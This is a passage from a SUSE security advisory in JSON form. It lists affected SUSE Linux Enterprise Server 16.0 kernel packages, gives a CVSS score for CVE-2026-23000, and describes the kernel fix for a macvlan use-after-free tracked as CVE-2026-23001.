"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-23000"
},
{
"cve": "CVE-2026-23001",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23001"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacvlan: fix possible UAF in macvlan_forward_source()\n\nAdd RCU protection on (struct macvlan_source_entry)-\u003evlan.\n\nWhenever macvlan_hash_del_source() is called, we must clear\nentry-\u003evlan pointer before RCU grace period starts.\n\nThis allows macvlan_forward_source() to skip over\nentries queued for freeing.\n\nNote that macvlan_dev are already RCU protected, as they\nare embedded in a standard netdev (netdev_priv(ndev)).\n\nhttps: //lore.kernel.org/netdev/695fb1e8.050a0220.1c677c.039f.GAE@google.com/T/#u",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
